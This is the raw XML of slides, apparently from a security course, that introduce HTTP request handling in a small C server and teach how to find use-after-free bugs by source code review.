        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3625393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5626-9164-5D40-BAA6-C47DA800BFE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="0"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Request  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="https://developer.mozilla.org/en-US/docs/Web/HTTP/Overview">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0AB0B26-49DB-9B48-937F-61ECD159F0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72" t="38580" r="16048" b="32677"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1835617" y="3050448"/>
            <a:ext cx="4520795" cy="11479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ello World - get file">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D36C13A-E78D-693E-F91F-1093C886A7CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="779182" y="1248047"/>
            <a:ext cx="7283824" cy="1147994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="643488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5626-9164-5D40-BAA6-C47DA800BFE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="0"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Response – HTML </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="HTTP response - html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7DD30D0-91FF-DC4D-9252-968764470EA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="870012" y="899896"/>
            <a:ext cx="6985308" cy="4173690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF10CE15-81A0-F14A-B27C-A5C4308544B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="870012" y="1191086"/>
            <a:ext cx="634457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9DA2F-006A-CB43-9508-EB32B8CFD313}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="870012" y="2257885"/>
            <a:ext cx="6985308"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FE0DB6-9B3C-C345-8030-5E6430CF7409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="870012" y="5073586"/>
            <a:ext cx="6985308"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2D7D13D-622B-304C-BA77-AA8D3A96D23A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7855320" y="2257885"/>
            <a:ext cx="0" cy="281570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B9CD45-72C6-C341-BB30-C0D13BB88371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="870012" y="2257884"/>
            <a:ext cx="0" cy="281570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758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4323-EEBC-D54E-B5EB-8EE80C289319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Class So Far</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7839ECC3-102D-89F3-7119-47FCF83E8570}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1626002656"/>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0661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B1A-52FF-4646-B6B7-B1ACED8A1685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Review of Source Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{016BB54A-6439-994C-97FC-5DBC6E217EFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1236540"/>
            <a:ext cx="7886700" cy="3761587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hierarchy of ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>server.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>server.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>utils.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>utils.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>server.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> holds HTTP stack processing code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>routes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="768927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C7EB-C134-BF75-AA91-10AEB0F95E7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Does Header Parsing Work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBB5F53F-BC15-07F7-C957-303874C78E54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>parse_headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reads in each header one by one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>interpret_headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interprets &amp; handles internal things based upon the headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1791222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D67E-F2E9-A84E-AB39-F9C36A236804}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source Code Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DC1B90B-4076-C20E-D589-C4F817EEE3EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2746286733"/>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8650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66C8-A996-B84E-8812-4F98BF4D9281}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pattern Matching</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B477655-B09C-1845-1A95-6C78A662AE9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1369219"/>
            <a:ext cx="3886200" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pick a vulnerability class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>simple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> way to detect the problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stare at this until your eyes bleed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Staring - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B56E86A7-5C98-9D40-BCE2-68B402D8CC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9150" y="1767585"/>
            <a:ext cx="3886200" cy="2466772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1905916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97AC5-8486-D243-9959-6788352AAC63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use After Free Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Use after free diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3F928AE-AE85-CB48-AABF-329E098F7A9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="485529" y="1268019"/>
            <a:ext cx="5220677" cy="2610339"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D976A450-4C7A-4F49-A7FF-D29C8F0F06D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5637320" y="1272984"/>
            <a:ext cx="3152171" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocate to Pointer 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free Pointer 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocate to Pointer 2 (recycles the memory)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both pointers can edit/view the same memory!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197523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2AA4-E092-7146-BE5D-7A23E9619C57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629841" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tracing a Use After Free – 1 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A3923F-BA97-1FE9-061D-51B0BC66B386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629842" y="1260872"/>
            <a:ext cx="3868340" cy="617934"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free Then Use</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99200646-0A80-5348-A937-C3B987AFE004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629842" y="1878809"/>
            <a:ext cx="3868340" cy="2763441"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Identify calls to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>on the variable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Trace code base for any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of this variable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If there is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> after the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, then we have found a vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="New digital tools could speed up Covid-19 contact tracing - STAT">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2CA09D9-FC0C-2A48-B0C5-E520D3F8F1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0486" y="1016053"/>
            <a:ext cx="3558055" cy="1992510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Free then Use vuln">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB23D6A-C01C-EF42-BA52-23402D7B9C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4810486" y="3085268"/>
            <a:ext cx="3768250" cy="1980394"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
